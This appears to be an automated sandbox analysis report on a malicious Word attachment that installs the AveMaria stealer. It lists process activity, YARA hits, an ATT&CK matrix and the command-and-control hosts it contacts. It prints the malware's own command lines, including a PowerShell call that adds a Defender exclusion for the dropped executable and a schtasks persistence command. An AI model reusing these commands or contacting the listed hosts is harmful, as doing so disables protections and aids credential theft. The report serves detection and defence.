Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t Program Manager
Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: J Program Managerr_

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Queries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe	Queries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe	Queries volume information: C:\Users\user\AppData\Roaming\explorer.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Increases the number of concurrent connection per server for Internet Explorer

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Jump to behavior

Source: explorer.exe, 00000014.00000002.994309984.0000000005DA9000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: procdump.exe

Stealing of Sensitive Information

Yara detected AveMaria stealer

Source: Yara match	File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2040, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR

Remote Access Functionality

Yara detected AveMaria stealer

Source: Yara match	File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Scripting	1 Scheduled Task/Job	412 Process Injection	11 Disable or Modify Tools	11 Input Capture	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Endpoint Denial of Service
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	2 Scripting	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	11 Input Capture	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	33 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	11 Command and Scripting Interpreter	Logon Script (Mac)	Logon Script (Mac)	11 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	112 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	3 PowerShell	Rc.common	Rc.common	13 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	412 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Hidden Users	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc	32%	ReversingLabs	Script.Exploit.CVE-2017-8570
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc	51%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\eDdYRRbouy.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\explorer.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
8.2.explorer.exe.3a2b638.11.unpack	100%	Avira	TR/AD.MortyStealer.utbzg		Download File
17.0.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Redcap.ghjpt		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
httP://login.929389.ank	0%	Avira URL Cloud	safe
http://login.929389.ankura.us	0%	Avira URL Cloud	safe
httP://login.929	0%	Avira URL Cloud	safe
httP://login.929389.ankura.us/Aw	0%	Avira URL Cloud	safe
20.126.95.155	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
login.929389.ankura.us	159.223.2.212	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
20.126.95.155	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://login.929389.ankura.us	powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.922726566.00000000035E7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleaner	powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp	false		high
httP://login.929	powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	low
httP://login.929389.ank	powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
httP://login.929389.ankura.us/Aw	powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/syohex/java-simple-mine-sweeperC:	explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032698870.000000000289A000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
20.126.95.155	unknown	United States		8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
159.223.2.212	login.929389.ankura.us	United States		46118	CELANESE-US	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	708250
Start date and time:	2022-09-23 08:12:10 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
